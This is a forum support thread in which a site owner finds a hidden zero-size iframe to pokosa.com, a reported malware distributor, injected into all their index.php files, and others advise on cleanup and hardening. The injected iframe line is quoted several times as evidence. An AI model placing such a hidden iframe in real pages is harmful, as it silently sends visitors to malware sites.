Guys my site was doing perfectly fine until today when my browser started bringing up this error:
Warning: Something's Not Right Here!
www {dot} superheroalliance {dot} net contains content from pokosa.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified pokosa.com that we found malware on the site. For more about the problems found on pokosa.com, visit the Google Safe Browsing diagnostic page.
Please tell me how this can be resolved as it seems to be frightening away my members :'(
I don't know what has caused this but it sure as hell is making me sad. Kindly help me out with this someone.
So I did a view page source of my site and found this at the end:
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
The question is how do I remove as in which file should I look into in order to remove this link?
Edited by K@ to add...
IF ANYONE'S CURIOUS AND WANTS TO CLICK ON THE LINK IN THIS POST... DON'T!
check which files have been recently edited and go from there.
Fixed! Thanks Illori <3
Quote from: agent47 on February 07, 2012, 05:52:29 AM
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
How did this get there in the first place?
Quote from: floridaflatlander on February 07, 2012, 09:10:17 AM
How did this get there in the first place?
There are many ways. Brute-forcing of FTP or other credentials, exploit of a different software on the same account, exploit of a different site on the same server if the server is poorly-secured, server-level security breach, ...
It would be nice to know how this happened, so others can try to avoid the same situation.
Quote from: Xarcell on February 08, 2012, 04:13:07 PM
It would be nice to know how this happened, so others can try to avoid the same situation.
If I knew I would explain mate but only today did I discover that ALL my
index.php files seem to be affected. It has basically appended the following line:
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe> onto all of my index.php files and I mean all so now I have to manually remove them from each of the files :(
Wish I knew how this happened.
It isn't enough to just clean it up. The fact that it's been done proves that you are somehow vulnerable. It's important that you must close the vulnerability by which they got in.
You should also check the .htaccess files in your account, they are another common target of malicious edits to try and slip by nasty stuff.
Think about all the other scripts you have installed, besides SMF, and check their versions. If any have new versions available, update them. You should also check through all .php scripts, not just index.php scripts. Look at their last modified times, or look for new files with strange names.
Also change all of your passwords. Wait with that one until you've fixed all the others that Roph mentioned, though, as the change of this happening twice is quite big if you don't close the holes.
looks like a Iframe hack. Without a clear inventory of what is in the OPs web space (in relationship to other software) it is hard t tell how they got in.
Double check your directory permissions. Remember,
0644 For Files
0755 For Directories
Also make sure you're not running any unconfigured web based file editors.
not all servers will have the files writable to the server with 644 and 755, you are best to contact your host, or even better not have the files writable to the server unless you are installing mods.